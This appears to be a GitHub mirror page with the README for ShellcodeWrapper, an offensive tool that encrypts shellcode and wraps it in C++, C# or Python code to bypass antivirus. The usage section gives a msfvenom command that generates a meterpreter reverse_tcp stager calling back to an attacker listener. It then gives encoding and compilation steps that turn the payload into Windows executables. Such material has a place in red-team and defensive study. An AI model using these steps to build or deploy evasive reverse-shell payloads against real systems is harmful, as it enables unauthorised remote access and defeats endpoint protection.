https://github.com/Arno0x/ShellcodeWrapper

Shellcode wrapper with encryption for multiple target languages
https://github.com/Arno0x/ShellcodeWrapper

Last synced: 4 months ago
JSON representation

Shellcode wrapper with encryption for multiple target languages

• Host: GitHub
• URL: https://github.com/Arno0x/ShellcodeWrapper
• Owner: Arno0x
• Created: 2017-01-23T11:06:30.000Z (about 9 years ago)
• Default Branch: master
• Last Pushed: 2017-01-23T11:09:14.000Z (about 9 years ago)
• Last Synced: 2024-04-09T20:30:31.856Z (about 2 years ago)
• Language: Python
• Homepage:
• Size: 6.84 KB
• Stars: 422
• Watchers: 12
• Forks: 123
• Open Issues: 3
• Metadata Files:
  • Readme: readme.md

Awesome Lists containing this project

• awesome-csirt - ShellcodeWrapper

README

          
Mutlibyte XOR or AES encrypted shellcode

============

Author: Arno0x0x - [@Arno0x0x](http://twitter.com/Arno0x0x)

These little proof of concept are inspired by this blogpost: [Bypass antivirus with 10 lines of code](http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html)

The technique uses two kind of code file:

1. The shellcode encoder/encrypter: `shellcode_encoder.py`

2. Various shellcode wrapper, in C++, C# and Python:

	- `encryptedShellcodeWrapper.cpp` - for now supports **only** XOR encryption

	- `encryptedShellcodeWrapper.cs` - supports both XOR and AES encryption

	- `encryptedShellcodeWrapper.py` - supports both XOR and AES encryption

Installation

----------------------

Installation is straight forward:

* Git clone this repository: `git clone https://github.com/Arno0x/ShellcodeWrapper ShellcodeWrapper`

* cd into the ShellcodeWrapper folder: `cd ShellcodeWrapper`

* Install requirements using `pip install -r requirements.txt`

* Give the execution rights to the main script: `chmod +x shellcode_encoder.py`

Usage

----------------------

First, you need to obtain a usable shellcode from metasploit (*run it from a Kali distribution*), for example:

```

root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > shellcode.raw

```

In this example, the output is a raw (*unencoded & unencrypted*) reverse_tcp meterpreter stager for x86 platform. You should adapt it to your needs (*payload and parameters*).

Second, run the `shellcode_encoder.py` script along with the desired arguments:

  - raw shellcode filename

  - encryption key

  - encryption type: `xor` or `aes`

  - desired output: `base64`, `cpp`, `csharp`, `python`

For instance, to xor encrypt the shellcode with the key '*thisismykey*' and get an output code file in C#, C++ and Python:

```

root@kali:~# ./shellcode_encoder.py -cpp -cs -py shellcode.raw thisismykey xor

```

This will generate C#, C++ and Python code file in the `result` folder. Those files are ready to use/compile.

Eventually:

1. For the C++ wrapper, compile the C++ code file into a Windows executable: you can create a new VisualStudio project for **Win32 console application** and use the C++ code provided as the main file. Any other method of compilation will require slight adjustment of the C++ code (headers mostly).

2. For the C# wrapper, compile the C# code file into a Windows executable:

	`C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:multibyteEncodeShellcode.exe multibyteEncodeShellcode.cs`

3. For the Python wrapper, just run it as a python script, or use PyInstaller to make it a Windows standalone executable